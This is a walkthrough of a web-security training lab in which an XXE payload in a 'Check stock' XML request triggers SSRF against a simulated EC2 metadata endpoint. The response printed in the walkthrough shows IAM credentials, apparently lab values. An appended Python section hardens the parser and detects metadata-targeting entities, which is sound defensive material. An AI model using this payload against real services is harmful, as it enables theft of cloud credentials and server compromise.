Burp Suite Lab — Exploiting XXE to perform SSRF attacks | WalkThrough
Introduction
XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. An attacker can escalate an XXE attack to compromise the underlying server or other back-end infrastructure by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks, and now we are going to see how it's done.
Target
This lab has a “Check stock” feature that parses XML input and returns any unexpected values in the response.
The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is http://169.254.169.254/. This endpoint can be used to retrieve data about the instance, some of which might be sensitive.
To solve the lab, exploit the XXE vulnerability to perform an SSRF attack that obtains the server’s IAM secret access key from the EC2 metadata endpoint.
Detection
As we can see, the website sends the request body as XML, so let's try to modify it ;).
So, this stock parameter is vulnerable to XXE attacks. Now let's check for an SSRF attack.
Exploitation
Payload used:
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'http://169.254.169.254/'>]><stockCheck><productId>&test;</productId><storeId>1</storeId></stockCheck>
Result: Success
Now, we have to gather the sensitive information.
To understand how the EC2 metadata endpoint is accessed and how the secret key is retrieved, I would recommend watching this video.
And the response contains the credentials:
"Invalid product ID: {
"Code" : "Success",
"LastUpdated" : "2021-12-25T00:58:57.127618174Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "qDCrjy0AaGQCWz8WBVuB",
"SecretAccessKey" : "lbNES1djjQiVgc18Ay0ONAJ6RjT1QkHMfhpi7z6Q",
"Token" : "UvLHsxfn3cqSLHfDcNFp7k8X6roFSBKFDvQFWeBkDwzVZBVRRXtqRwlKKb5f7fT5T4T7uyEEWi52D3DMZUId0mPbDyrMh8jwlweNFbodOV5cDzxkUE5QoCLCn8YqRk490TX8KqW1pt93lnErjSZK8HMgxEi1J3CKjcueXFnThrq8FDeC3yo1ZCLPP2zJVoz6queBLzAgramaNQ9CbkE9qJhZwDi8Hm5f37A9Z9w3oLVBjSnB61eWRg4bSC4w4qHv",
"Expiration" : "2027-12-24T00:58:57.127618174Z"
}"
We have successfully obtained the server's IAM secret access key from the EC2 metadata endpoint by using the XXE vulnerability to perform SSRF.
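As an added defensive example (not part of the original walkthrough or of the lab's own code), the Python snippet below shows the fix a developer would apply to the "Check stock" endpoint and a detection helper for the blue team. The parser refuses any document carrying a DOCTYPE, which is what makes the `<!ENTITY ... SYSTEM ...>` declaration in the payload above possible, and only then reads the two expected fields. The detection helper pulls every external entity URI out of an inline DTD and flags the instance metadata address from the lab, 169.254.169.254. It uses only the standard library; the request samples, the `stockCheck`/`productId`/`storeId` element names and the function names are constructed to match the lab's request shape and are assumptions about the target application.

```python
import re
import urllib.parse
import xml.etree.ElementTree as ET

# Constructed sample: a benign request in the same shape as the lab's "Check stock" feature.
SAFE_REQUEST = (
    '<?xml version="1.0"?>'
    '<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>'
)

# Constructed sample mirroring the walkthrough's payload: an external entity that
# points at the (simulated) EC2 metadata endpoint.
XXE_REQUEST = (
    '<?xml version="1.0"?>'
    "<!DOCTYPE root [<!ENTITY test SYSTEM 'http://169.254.169.254/'>]>"
    '<stockCheck><productId>&test;</productId><storeId>1</storeId></stockCheck>'
)

# Hosts whose appearance in an entity URI is a strong SSRF-via-XXE indicator
# (the EC2 metadata address from the lab; extend for your own environment).
METADATA_HOSTS = {"169.254.169.254"}

_DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)

# Matches <!ENTITY name SYSTEM "uri"> and <!ENTITY name PUBLIC "pubid" "uri">,
# including parameter entities (<!ENTITY % name ...>). Group 1 or 2 holds the URI.
_EXTERNAL_ENTITY_RE = re.compile(
    r"""<!ENTITY\s+%?\s*\S+\s+(?:SYSTEM|PUBLIC\s+(?:"[^"]*"|'[^']*'))\s+(?:"([^"]*)"|'([^']*)')""",
    re.IGNORECASE,
)


def external_entity_uris(xml_text: str) -> list:
    """Return every SYSTEM/PUBLIC entity URI declared in an inline DTD (for logging/alerting)."""
    return [dq or sq for dq, sq in _EXTERNAL_ENTITY_RE.findall(xml_text)]


def targets_metadata_service(xml_text: str) -> bool:
    """Detection rule: True when any external entity resolves to an instance metadata host."""
    for uri in external_entity_uris(xml_text):
        if urllib.parse.urlsplit(uri).hostname in METADATA_HOSTS:
            return True
    return False


def parse_stock_check(xml_text: str) -> dict:
    """Hardened parse of a stockCheck request.

    Rejecting the DOCTYPE up front means no entity (internal, external or parameter)
    can ever be declared, so the parser has nothing to resolve or fetch.
    """
    if _DOCTYPE_RE.search(xml_text):
        return {
            "ok": False,
            "reason": "DOCTYPE/DTD not allowed",
            "external_entities": external_entity_uris(xml_text),
        }
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return {"ok": False, "reason": f"malformed XML: {exc}"}
    if root.tag != "stockCheck":
        return {"ok": False, "reason": f"unexpected root element {root.tag!r}"}

    fields = {}
    for name in ("productId", "storeId"):
        node = root.find(name)
        text = (node.text or "").strip() if node is not None else ""
        # Whitelist the value shape too: both IDs are numeric in the lab.
        if not text.isdigit():
            return {"ok": False, "reason": f"missing or non-numeric {name}"}
        fields[name] = text
    return {"ok": True, "fields": fields}


if __name__ == "__main__":
    for label, body in (("safe", SAFE_REQUEST), ("xxe", XXE_REQUEST)):
        print(label, parse_stock_check(body), "metadata-target:", targets_metadata_service(body))
```

Blocking the DOCTYPE outright is the simplest robust configuration because it removes the whole entity mechanism rather than trying to enumerate dangerous entity forms; the regex-based helper is for monitoring what was attempted (feed it the rejected request bodies), not a substitute for the parser-side block.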